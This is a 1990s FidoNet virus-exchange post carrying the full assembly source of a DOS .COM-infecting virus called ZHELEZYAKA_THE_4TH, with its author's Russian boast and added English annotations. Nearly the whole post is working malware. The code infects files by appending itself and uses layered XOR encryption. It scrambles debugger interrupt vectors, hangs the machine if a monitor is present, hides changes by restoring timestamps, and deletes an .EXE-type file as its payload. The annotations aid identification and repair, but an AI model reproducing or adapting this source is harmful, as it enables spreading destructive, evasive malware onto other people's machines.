;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg  : 1 of 64
; From : MeteO                               2:5030/136      Tue 09 Nov 93 08:59
; To   : -  *.*  -                                           Fri 11 Nov 94 08:10
; Subj : ViRii
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : ABC.PVT.HACK (ABC: • æª...)
;* From : Alexei Galich, 123:1000/6.2 (31 Oct 94 13:44)
;* To   : All
;* Subj : ViRii
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;Пpиветствyю Вас, All
;
;Вот виpyс написал, стpашный, сам писал !
;Hаезды пpинимаются с 1:00-8:00
;
;PS: Hy не знаю я почемy он табyляцию не понял, извините.
;
;--------8<-------------------------------------------------------
;
;
;         ZHELEZYAKA_THE_4TH

  ; Assembler setup: TASM Ideal mode, tiny model, code origin 100h (a DOS .COM
  ; image). LOCALS enables the block-scoped @@ labels used throughout the file.
  IDEAL
  MODEL TINY
  CODESEG
  ORG 100H
  LOCALS
; First-generation carrier: a jump to the virus entry point followed by a
; marker. The DB starts with 04h, the same value as VIRUS_SIGNATURE; assuming
; the JMP assembles to 3 bytes, that byte sits at file offset 3, which is the
; position the infection check in the search loop compares, and the following
; 0 byte sits at 104h (FALSE_BYTE_ADDR). The ASCII name string lies before
; VIRUS_START_O, so it is present in this carrier only and is not part of the
; body that INFECT_FILE copies into other files.
MAIN_BEGIN: JMP VIRUS_START_O
  DB 04H,0,' ZHELEZYAKA_THE_4TH ',0

; ---- Fixed values --------------------------------------------------------
EXIT_ADDRESS EQU 100H           ; .COM entry address (not referenced by name in this listing)
DOS  EQU 21H                    ; DOS services interrupt
VIRUS_SIGNATURE EQU 04H         ; infection marker stored in the 4th byte of an infected file
NUM_FIRST_BYTES EQU 4           ; number of host bytes replaced at the start of the file
ALREADY_INFECT EQU 3            ; threshold used by the counter logic in NO_FILES_FOUND
COUNTER_ADDR EQU 510H           ; offset of a 2-byte counter, accessed with ES=0 (0000:0510)
FALSE_BYTE_ADDR EQU 104H        ; 5th byte of the running program image; feeds the coder and the length padding
; ---- Offsets relative to VIRUS_START_O -----------------------------------
; The code is position independent: SI holds the run-time address of
; VIRUS_START_O and every data reference is written as [SI+<offset>].
COM_WILDCARD EQU (COM_WILDCARD_O-VIRUS_START_O)
EXE_WILDCARD EQU (EXE_WILDCARD_O-VIRUS_START_O)

; Scratch areas placed in memory directly after the virus body (WRITE_BUFFER_O
; is the last label before END, so none of this is part of the stored body).
WRITE_BUFFER EQU (WRITE_BUFFER_O-VIRUS_START_O)  ; 4 bytes: new file header (E9h, disp16, signature)
ORIGIN_DIR EQU (WRITE_BUFFER+NUM_FIRST_BYTES)    ; 65 bytes: '\' + saved current directory
NEW_DTA  EQU (ORIGIN_DIR+65)                     ; private DTA for find-first/find-next
COPY_BUFFER EQU (NEW_DTA+256)                    ; working copy of the body that gets encoded and written
FALSE_BYTES EQU (COPY_BUFFER+WRITE_BUFFER)       ; first offset past the copied body; used as an absolute address in INFECT_FILE

ORIGIN_BEGIN EQU (ORIGIN_BEGIN_O-VIRUS_START_O)  ; saved original first 4 bytes of the host
MAIN_PART_LEN EQU (WRITE_BUFFER)                 ; length of the virus body in bytes
INFECTED_NUMB EQU (INFECTED_NUMB_O-VIRUS_START_O) ; NOTE(review): INFECTED_NUMB_O is not defined in this listing; the name is unused
XOR_VALUE EQU (XOR_VALUE_O-VIRUS_START_O)        ; master copy of the per-generation key byte
; Six further copies of the key byte, embedded between instructions.
XOR_VAL0 EQU (XOR_VAL0_O-VIRUS_START_O)
XOR_VAL00 EQU (XOR_VAL00_O-VIRUS_START_O)
XOR_VAL1 EQU (XOR_VAL1_O-VIRUS_START_O)
XOR_VAL2 EQU (XOR_VAL2_O-VIRUS_START_O)
XOR_VAL3 EQU (XOR_VAL3_O-VIRUS_START_O)
XOR_VAL4 EQU (XOR_VAL4_O-VIRUS_START_O)
BEGIN_CODING EQU (BEGIN_CODING_O-VIRUS_START_O)  ; start of the region processed by CODER_DECODER
CONT_CODING EQU (CONT_CODING_O-VIRUS_START_O)    ; start of the region processed by FIRST_CODE
MESSAGE  EQU (MESSAGE_O-VIRUS_START_O)
DOT  EQU (DOT_O-VIRUS_START_O)

; Entry stub. It is stored unencoded, so its instruction bytes are constant
; across infected files; only the two embedded key bytes (XOR_VAL0_O,
; XOR_VAL00_O) change from one generation to the next.
; The CALL pushes the address of the byte after it (VIRUS_START_O+3); popping
; that and subtracting 3 gives the run-time address of VIRUS_START_O, which is
; kept in SI as the base for all [SI+offset] data references.
VIRUS_START_O: CALL DETECT_BEGIN_O
XOR_VAL0_O DB 0                 ; key-byte copy; skipped by the CALL above
DETECT_BEGIN_O: POP SI
  SUB SI,3 ; SI = start of the virus
  JMP SHORT @@0
XOR_VAL00_O DB 0                ; key-byte copy; skipped by the JMP SHORT above
@@0:  LEA DI,[SI+BEGIN_CODING]  ; DI = start of the region CODER_DECODER will decode
  CALL CODE                     ; CODE ends by jumping into CODER_DECODER, whose RET comes back here
BEGIN_CODING_O =$               ; everything from here to CODER_DECODER is stored encoded

  ; Host repair in memory: copy the 4 saved original bytes from ORIGIN_BEGIN
  ; back to 100h so the host program can be run later from EXECUTE_PROG.
  MOV CX,NUM_FIRST_BYTES ; Heal
  LEA DI,[SI+ORIGIN_BEGIN] ; the file
  MOV BX,100H   ; in
MOVE_LOOP: MOV AH,[DI]   ; memory
  MOV [BX],AH   ;
  INC DI   ;
  INC BX   ;
  LOOP MOVE_LOOP  ;

  ; INT 21h AH=1Ah: point the DTA at the private buffer so that file searches
  ; do not overwrite the default DTA at offset 80h of the PSP.
  LEA DX,[SI+NEW_DTA] ; Set
  MOV AH,1AH  ; our own
  CALL CHECK  ; DTA

  ; INT 21h AH=47h: store the current directory at ORIGIN_DIR+1. Byte 0 of the
  ; buffer is left free; the restore code later writes '\' there.
  MOV AH,47H   ;
  PUSH SI   ; Remember
  LEA SI,[SI+ORIGIN_DIR+1] ; the current
  CWD    ; directory (AX=47xxh is non-negative, so CWD zeroes DX: DL=0 = default drive)
  CALL CHECK   ;
  POP SI   ; SI was borrowed as the buffer pointer; restore the virus base

; Search loop: enumerate *.COM in the current directory and stop at the first
; file whose 4th byte is not VIRUS_SIGNATURE. Already-marked files are closed
; and skipped. When the directory is exhausted control goes to NO_FILES_FOUND.
FIND_FIRST: LEA DX,[SI+COM_WILDCARD] ; Search for the first
  XOR CX,CX   ; COM file (CX=0: attribute mask)
  MOV AH,4EH   ; INT 21h AH=4Eh find first
FIND_NEXT: INT DOS   ; shared by find-first (4Eh) and find-next (4Fh)
  JNC @@L1   ;
  JMP NO_FILES_FOUND  ; If there is none, then ...
@@L1:
  ; Offset 1Eh of the DTA holds the ASCIIZ name of the file just found.
  LEA DX,[SI+NEW_DTA+1EH] ; Open
  MOV AX,3D02H  ; this
  CALL CHECK   ; file (read/write; the result of the open is not checked here)


  MOV BX,AX   ; Read          (BX = file handle)
  MOV AH,3FH   ; the first 4
  LEA DX,[SI+ORIGIN_BEGIN] ; bytes
  MOV DI,DX   ; from
  MOV CX,NUM_FIRST_BYTES ; this
  INT DOS   ; file           (they overwrite the saved-host-bytes slot)
  ADD DI,NUM_FIRST_BYTES-1      ; DI -> 4th byte that was read

  ; Infection marker test: the 4th byte of the file equals VIRUS_SIGNATURE
  ; (04h) when the file already carries the virus.
  CMP [BYTE PTR DI],VIRUS_SIGNATURE
  JE @@L2
  JMP INFECT_FILE
@@L2:
  MOV AH,3EH  ; Close
  CALL CHECK  ; the file

CONT_SEARCHING: MOV AH,4FH  ; Find
  JMP FIND_NEXT ; the next file

; Constant data. This area lies between BEGIN_CODING_O and CODER_DECODER, so in
; an infected file these strings are stored encoded and do not appear as
; plaintext.
COM_WILDCARD_O DB '*.COM',0     ; search pattern for infection targets
EXE_WILDCARD_O DB '*.E*',0      ; search pattern used by the file-deletion payload (INFECT_MORE)

MESSAGE_O DB 13,10,'ZHELEZYAKA_THE_4TH WITH YOU FOREVER',13,10,'$'   ; '$'-terminated text printed by BANNER
DOT_O  DB '..',0                ; parent-directory path for the upward directory walk

; Reached when the current directory has no further *.COM candidate.
; First tries to move one directory up and repeat the search; once the chdir
; to '..' fails, the 2-byte counter at 0000:0510 decides what happens next:
;   low byte  - incremented on every pass through here;
;   high byte - incremented by INFECT_MORE each time the deletion payload runs.
; low byte > ALREADY_INFECT       -> INFECT_MORE (file-deletion payload)
; high byte > ALREADY_INFECT-2    -> BANNER (message and beeps, counter reset)
; otherwise                       -> EXECUTE_PROG (run the host)
NO_FILES_FOUND: MOV AH,3BH  ; Move
  LEA DX,[SI+DOT] ; one directory
  INT DOS  ; up
  JC @@L4  ; while
  JMP FIND_FIRST ; possible
@@L4:
  XOR AX,AX   ;
  MOV ES,AX   ; Increment
  MOV DI,COUNTER_ADDR  ; the counter      (ES:DI = 0000:0510)
  MOV AX,[ES:DI]  ;

  INC AL   ;
  MOV [ES:DI],AX  ; What
  CMP AL,ALREADY_INFECT ; shall we
  JG INFECT_MORE  ; do?
  CMP AH,ALREADY_INFECT-2 ;
  JG BANNER   ;
  JMP EXECUTE_PROG  ;

; Visible payload: zero the counter word at ES:DI (set up by the caller path in
; NO_FILES_FOUND), print the '$'-terminated MESSAGE through INT 21h AH=09h and
; output the BEL character (7) five times through INT 21h AH=02h, then run the
; host.
BANNER:  XOR AX,AX ; Reset the counter
  MOV [ES:DI],AX

  LEA DX,[SI+MESSAGE]  ; Print
  MOV AH,9   ; the message
  CALL CHECK   ;

  MOV CX,5 ;
CONTINUE_NOISE: MOV DL,7 ; Beep
  MOV AH,2 ;
  INT DOS ;
  LOOP CONTINUE_NOISE
  JMP EXECUTE_PROG

; Destructive payload (author's comment: "erasing the first .E* file").
; Resets the low counter byte, increments the high byte, changes back to the
; directory that was current at start-up, looks for the first file matching
; '*.E*' there and deletes it with INT 21h AH=41h. Falls through to
; EXECUTE_PROG afterwards. For responders: an unexplained missing .EXE (or
; other .E* file) next to an infected .COM is consistent with this routine.
INFECT_MORE: XOR AL,AL  ; Erasing the first .E* file
  INC AH
  MOV [ES:DI],AX

  LEA DI,[SI+ORIGIN_DIR] ;
  MOV [BYTE PTR DI],'\' ; Restore        ('\' is written in front of the saved path)
  MOV AH,3BH   ; the old
  XCHG DX,DI   ; directory      (DX = path for INT 21h AH=3Bh chdir)
  INT DOS   ;

  LEA DX,[SI+EXE_WILDCARD]
  XOR CX,CX
  MOV AH,4EH                    ; find first '*.E*'
  INT DOS
  JC EXECUTE_PROG               ; nothing matched: skip the deletion

  LEA DX,[SI+NEW_DTA+1EH]       ; name of the file just found (DTA offset 1Eh)
  MOV AH,41H                    ; INT 21h AH=41h delete file
  INT 21H

; Common exit: undo the environment changes and hand control to the host.
; Sets the DTA back to offset 80h, changes back to the directory saved at
; start-up, makes ES equal to DS and jumps to 100h, where the host's original
; first bytes were restored at the beginning of the run.
EXECUTE_PROG: MOV DX,80H ; Set
  MOV AH,1AH ; the old
  INT DOS ; DTA

  LEA DI,[SI+ORIGIN_DIR] ;
  MOV [BYTE PTR DI],'\' ; Restore
  MOV AH,3BH   ; the old
  XCHG DX,DI   ; directory
  INT DOS   ;

  MOV AX,DS
  MOV ES,AX
  MOV BP,100H   ;
  JMP BP   ; transfer control to the host program

; Appending infection of the open .COM file (handle in BX, its original first
; 4 bytes already read into ORIGIN_BEGIN by the search loop).
; Resulting file layout, useful for identification and repair:
;   offset 0     : E9h (near JMP)
;   offset 1..2  : original file length - 3 (jump displacement to the appended body)
;   offset 3     : 04h (VIRUS_SIGNATURE)
;   end of file  : MAIN_PART_LEN bytes of virus body, mostly encoded, followed
;                  by 0..255 filler bytes
; The original first 4 bytes are kept inside the appended body at ORIGIN_BEGIN
; (within the encoded region). The file's date/time stamp is read before and
; written back after the modification, so the timestamp does not reveal the
; change. One file is infected per run; control then goes to EXECUTE_PROG.
INFECT_FILE:
  XOR AL,AL    ;
  MOV AH,[BYTE PTR SI+XOR_VALUE] ;
@@IFZERO: INC AH    ; step the key; repeat once if it wrapped to 0
  JZ @@IFZERO   ; Prepare
  MOV [BYTE PTR SI+XOR_VALUE],AH ; the new
  MOV [SI+XOR_VAL0],AH  ; key            (same byte stored at seven places,
  MOV [SI+XOR_VAL00],AH  ;                 six of them between instructions
  MOV [SI+XOR_VAL1],AH  ;                 of the unencoded stubs)
  MOV [SI+XOR_VAL2],AH  ;
  MOV [SI+XOR_VAL3],AH  ;
  MOV [SI+XOR_VAL4],AH  ;

  MOV AX,5700H ; Remember      (INT 21h AX=5700h: get file date/time)
  CALL CHECK  ; the time
  PUSH CX  ; of creation   (CX = time)
  PUSH DX  ;               (DX = date)

  XOR CX,CX  ; Go
  XOR DX,DX  ; to
  MOV AX,4202H ; the end       (seek to EOF; returns the file length in DX:AX)
  CALL CHECK  ; of the file

  SUB AX,3    ; Prepare        (displacement of a 3-byte JMP at offset 0 to EOF)
  MOV [BYTE PTR SI+WRITE_BUFFER],0E9H ; the new
  MOV [SI+WRITE_BUFFER+1],AX  ; 4 bytes
  MOV [BYTE PTR SI+WRITE_BUFFER+3],VIRUS_SIGNATURE

  ; Work on a copy so the running instance stays executable while the copy is
  ; encoded.
  MOV CX,MAIN_PART_LEN     ;
  MOV DI,SI       ; Copy
COPY_LOOP: MOV AH,[DI]       ; the virus
  MOV [DI+COPY_BUFFER],AH     ; into
  INC DI       ; the buffer
  LOOP COPY_LOOP      ;

  LEA DI,[SI+COPY_BUFFER+BEGIN_CODING]   ; Encode
  CALL CODER_DECODER      ; it             (layer 1: BEGIN_CODING region of the copy)

  LEA DI,[SI+COPY_BUFFER+CONT_CODING]
  CALL FIRST_CODE               ; layer 2: single-byte XOR over the CODER_DECODER..FIRST_CODE region of the copy

  ; Length written = body length + one byte's worth of filler (0..255). The
  ; filler count is the sum of the byte at 104h and the byte at the absolute
  ; address FALSE_BYTES; the filler itself is whatever memory follows the body
  ; in the copy buffer. Size growth therefore differs between infected files.
  MOV CX,MAIN_PART_LEN  ; Pick
  MOV AL,[BYTE PTR FALSE_BYTE_ADDR] ; the length
  ADD AL,[FALSE_BYTES]  ;
  XOR AH,AH    ;
  ADD CX,AX    ; Write
  LEA DX,[SI+COPY_BUFFER]  ; the main
  MOV AH,40H    ; part
  INT DOS    ; of the virus   (file pointer is at EOF from the seek above)


  XOR CX,CX  ; Go
  XOR DX,DX  ; to
  MOV AX,4200H ; the start
  CALL CHECK  ; of the file

  MOV CX,NUM_FIRST_BYTES ; Patch
  LEA DX,[SI+WRITE_BUFFER] ; the first
  MOV AH,40H   ; bytes
  INT DOS   ; of the file

  POP DX  ; Restore
  POP CX  ; the time
  MOV AX,5701H ; of creation   (INT 21h AX=5701h: set file date/time)
  CALL CHECK  ;

  MOV AH,3EH  ; Close
  INT DOS  ; the file

  CALL CODE_INT                 ; second XOR pass over 0000:0001..000C; undoes the pass made in CODE

  JMP EXECUTE_PROG

; Saved first 4 bytes of the host. In this first-generation carrier they are
; INT 20h / NOP / NOP, i.e. the "host" simply terminates. The infection check
; in the search loop reads each candidate's first 4 bytes into this slot.
ORIGIN_BEGIN_O DB 0CDH,20H,90H,90H

CONT_CODING_O =$                ; start of the region handled by FIRST_CODE

; Main coder, used for both directions: INFECT_FILE calls it on the working
; copy to encode, and CODE jumps here at start-up to decode in place.
; In:  DI = start of data, SI = virus base.
; Processes CODER_DECODER-BEGIN_CODING_O-1 bytes with a running XOR key.
; The running value is not held in a register or in memory: it is written to
; and read back from I/O port 21h (on the PC, the interrupt-mask register of
; the master 8259 PIC). Per byte: read port -> add key byte -> XOR the data
; byte -> add the byte at 104h -> write port. Assuming the port returns the
; value last written, byte i is XORed with (i+1)*key + i*[104h] (mod 256).
; Consequences for analysis: hardware interrupts are masked in an arbitrary
; pattern while the loop runs, and an emulator or debugger that does not model
; port 21h produces wrong plaintext. On exit the mask is set to 0 (all IRQs
; enabled), whatever it was before.
; Clobbers AX, CX, DI.
CODER_DECODER: MOV CX,CODER_DECODER-BEGIN_CODING_O-1
  MOV AH,[SI+XOR_VALUE]         ; AH = per-generation key byte
  XOR AL,AL
  OUT 21H,AL                    ; running value starts at 0
CODING_LOOP: IN AL,21H
  ADD AL,AH
  XOR [DI],AL   ; The coder
  INC DI   ; itself
  ADD AL,[FALSE_BYTE_ADDR]
  OUT 21H,AL   ;
  LOOP CODING_LOOP  ;
  XOR AL,AL
  OUT 21H,AL                    ; leave the mask register at 0
  RET

; Guarded INT 21h wrapper (author's comment: "interrupt blocking").
; In:  registers as required by the DOS function selected in AH/AX.
; Out: AX and flags as returned by INT 21h; other registers as DOS left them.
; Before the DOS call it writes 0FEh to port 21h (PIC interrupt mask: every
; IRQ masked except IRQ0). After the call it reads the port back; if the value
; is no longer 0FEh the routine spins forever at @@HALT. Observable effect for
; an analyst: when something changes the mask during the DOS call (a monitor,
; debugger or resident program), the machine hangs instead of continuing.
; On the normal path the mask is then set to 0, enabling all IRQs regardless
; of the state before the call.
CHECK:  PUSH AX ; Interrupt blocking
  PUSHF
  MOV AL,0FEH
  OUT 21H,AL
  MOV AH,4FH                    ; has no effect: AX is reloaded by the POP AX below
  POPF
  POP AX
  INT 21H
  PUSH AX                       ; keep the DOS result and flags across the port check
  PUSHF
  IN AL,21H
  CMP AL,0FEH
@@HALT:  JNE @@HALT             ; mask was altered during the call: endless loop
  XOR AL,AL
  OUT 21H,AL
  POPF
  POP AX
  RET

; Interrupt-vector scrambling (author's comment: "encoding INT 0 - 3").
; XORs the 12 bytes at 0000:0001 .. 0000:000C with 0AAh; BX runs from 12 down
; to 1, so byte 0000:0000 is not touched. That range lies in the vector-table
; entries for INT 0 to INT 3, which include the single-step (INT 1) and
; breakpoint (INT 3) vectors a debugger relies on.
; XOR is its own inverse: a second call restores the bytes. CODE calls this
; once at start-up and INFECT_FILE calls it once more after infecting a file;
; on paths that never reach INFECT_FILE only the first call happens, leaving
; the bytes altered when the host is started.
; Clobbers AX, BX, CX; leaves ES = CS.
CODE_INT: XOR AX,AX ; Encoding of INT 0 - 3
  MOV ES,AX
  MOV CX,12
COD_INT_CON: MOV BX,CX
  XOR [BYTE PTR ES:BX],10101010B
  LOOP COD_INT_CON
  PUSH CS
  POP ES
  RET
       ; ------------
; Outer coding layer (author's comment: "preliminary coder").
; In:  DI = start of data, SI = virus base.
; XORs FIRST_CODE-CODER_DECODER bytes with the constant key byte; with DI set
; to CONT_CODING that covers CODER_DECODER, CHECK and CODE_INT. The routine
; itself is stored unencoded. Two key-byte copies are embedded in the
; instruction stream and jumped over, so the stored bytes of this routine
; differ between generations only at those positions.
; Clobbers AH, CX (0 on return), DI.
FIRST_CODE: MOV CX,FIRST_CODE-CODER_DECODER ; Preliminary
  MOV AH,[SI+XOR_VALUE]  ; coder
  JMP SHORT FIRST_COD_LOOP
XOR_VAL1_O DB 0                 ; key-byte copy (data, never executed)
FIRST_COD_LOOP: XOR [DI],AH
  INC DI
  JMP SHORT @@2
XOR_VAL2_O DB 0                 ; key-byte copy (data, never executed)
@@2:  LOOP FIRST_COD_LOOP
  RET

XOR_VALUE_O DB 0                ; master key byte; 0 in this carrier, stepped by INFECT_FILE

; Start-up decoder driver, stored unencoded apart from the embedded key bytes.
; In:  DI = start of the CODER_DECODER region (saved and restored here),
;      SI = virus base.
; Order of operations:
;   1. FIRST_CODE over CONT_CODING removes the outer XOR layer from
;      CODER_DECODER, CHECK and CODE_INT, which the next steps call.
;   2. One INT 21h AH=40h request is issued through CHECK with BX and DX not
;      set up by this code; CX is 0 because FIRST_CODE's LOOP has just run
;      out. The author's comment gives the purpose as fooling an interceptor.
;   3. CODE_INT alters the low interrupt-vector bytes.
;   4. A jump (not a call) into CODER_DECODER decodes the main region; its RET
;      uses the return address pushed by the CALL CODE in the entry stub.
CODE:  PUSH DI
  LEA DI,[SI+CONT_CODING]
  JMP @@3
XOR_VAL3_O DB 0                 ; key-byte copy (data, never executed)
@@3:  CALL FIRST_CODE
  MOV AH,40H
  JMP @@4
XOR_VAL4_O DB 0                 ; key-byte copy (data, never executed)
@@4:  CALL CHECK  ; To fool the interceptor
  CALL CODE_INT
  POP DI
  JMP SHORT CODER_DECODER

WRITE_BUFFER_O =$               ; end of the stored body; scratch buffers follow in memory
  END MAIN_BEGIN

;---------------8<-------------------------------------------------
;
;- Все это было бы пpикольно, когда бы не было так больно.
;
;  -= iR0NMAN =-
;
;-+- GoldED 2.50.B1016+
; + Origin: Œ…H’Ž‚Š€ - ’Ž €‡„HˆŠ !!! (123:1000/6.2)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
;    þ The MeÂeO
;
;/p            Check for code segment overrides in protected mode
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)